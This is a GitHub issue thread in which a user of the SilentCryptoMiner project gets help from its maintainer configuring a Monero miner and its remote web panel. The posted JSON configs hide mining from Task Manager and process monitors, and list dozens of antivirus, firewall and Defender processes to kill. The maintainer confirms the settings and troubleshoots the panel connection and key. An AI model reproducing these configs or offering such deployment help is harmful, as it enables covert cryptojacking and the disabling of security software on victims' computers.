### ISSUE TITLE
Bro Quick Help Please

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#2382]
i forget how was look like to mining to https://moneroocean.stream/
how was config look like in remote config 
If you type to me example it will help aloot

**Comment by tarekxxx** [comment]
{
	"algo": "rx/0",
	"pool": "gulf.moneroocean.stream",
	"port": 20128,
	"wallet": "WALLET",
	"password": "{COMPUTERNAME}",
	"ssltls": true,
	"max-cpu": 20,
	"idle-wait": 1,
	"idle-cpu": 80,
	"stealth": true,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,AndroidEmulatorEn.exe,s2_sp64_ship.exe,BravoHotelClient-Win64-Shipping.protected.exe",
	"kill-targets": "zerotier-one_x64.exe,xmsdiag.exe,afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,MRT.exe"
	"api-endpoint": "site/api/endpoint.php"
}
it should be like this ???

**Comment by UnamSanctam** [comment]
Yes that is correct.

**Comment by tarekxxx** [comment]
this with modify webpanel ? or i should modify ?? something in endpoint.php=secret ?

**Comment by UnamSanctam** [comment]
If you want to set/change the web panel domain from the builder setting then you should use "api-endpoint", if you use the secret key that we made before then you should add `?key=YOURKEY` to the end of `endpoint.php` (change YOURKEY to whatever key you set in the web panel).

**Comment by tarekxxx** [comment]
it should be "api-endpoint": "site/api/endpoint.php?key=yourkey"
right ?

**Comment by UnamSanctam** [comment]
Yes that's right.

**Comment by tarekxxx** [comment]
can you double check my config seems not working 
there no connection back to pool ?
{
	"algo": "rx/0",
	"pool": "gulf.moneroocean.stream",
	"port": 20128,
	"wallet": "wallet",
	"password": "{COMPUTERNAME}",
	"ssltls": true,
	"max-cpu": 20,
	"idle-wait": 1,
	"idle-cpu": 80,
	"stealth": true,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "zerotier-one_x64.exe,xmsdiag.exe,afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,MRT.exe",
	"stealth-fullscreen": true,
	"api-endpoint": "IP/api/endpoint.php?key=pass"
}

**Comment by UnamSanctam** [comment]
And are you absolutely sure your key is correct? `"api-endpoint": "http://IP/api/endpoint.php?key=YOURKEY"` where the YOURKEY should be the exact same one you specified in your endpoint.php.

**Comment by tarekxxx** [comment]
i even change to x and to config x the key
"api-endpoint": "http://IP/api/endpoint.php?key=x"
open port forward and check checkport online and its open sucessfull where should problem ?

**Comment by tarekxxx** [comment]
should i back to old one the hackable one to can use panel ?

**Comment by UnamSanctam** [comment]
Is your database folder (db) and file (unamwebpanel.db) writable?

**Comment by tarekxxx** [comment]
Yes

**Comment by tarekxxx** [comment]
502 Bad Gateway
saying even i get correct key

**Comment by UnamSanctam** [comment]
If you're getting a 502 then there's likely something wrong with your servers network.

**Comment by tarekxxx** [comment]
i tested on ngrok to see where problem then i found 502

**Comment by UnamSanctam** [comment]
Then there's something wrong with the ngrok configuration, error 502 has nothing to do with the web panel but instead with the server network configuration. But other than that are you able to save any configurations in the "Configurations" tab? As in, if you save or create a configuration is it still there when you refresh the page?

**Comment by UnamSanctam** [comment]
A bit hard to see but the code should be the one in the issue from before https://github.com/UnamSanctam/UnamWebPanel/issues/352#issuecomment-2043108194.

**Comment by tarekxxx** [comment]
yea its was same error in code LOL thanks aloot
